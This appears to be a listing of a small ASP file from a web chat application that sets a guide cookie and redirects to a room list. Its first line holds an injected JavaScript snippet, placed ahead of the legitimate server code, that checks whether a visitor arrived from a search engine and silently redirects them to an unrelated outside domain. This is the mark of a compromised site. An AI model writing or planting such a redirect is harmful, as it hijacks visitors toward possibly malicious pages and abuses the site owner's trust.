d:\wwwroot\wuchunhua\liaotianim\Cookie.asp

001: <script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script><!--#include file="inc/DAL.asp"-->
002: <!--#include file="inc/md5.asp"-->
003: <%
004: On Error Resume Next
005: Response.Cookies("IsGuide")="true"
006: Response.Cookies("IsGuide").Expires=DateAdd("m",60,now())
007: Response.Redirect "RoomList.asp"
008: %
>
009:
010: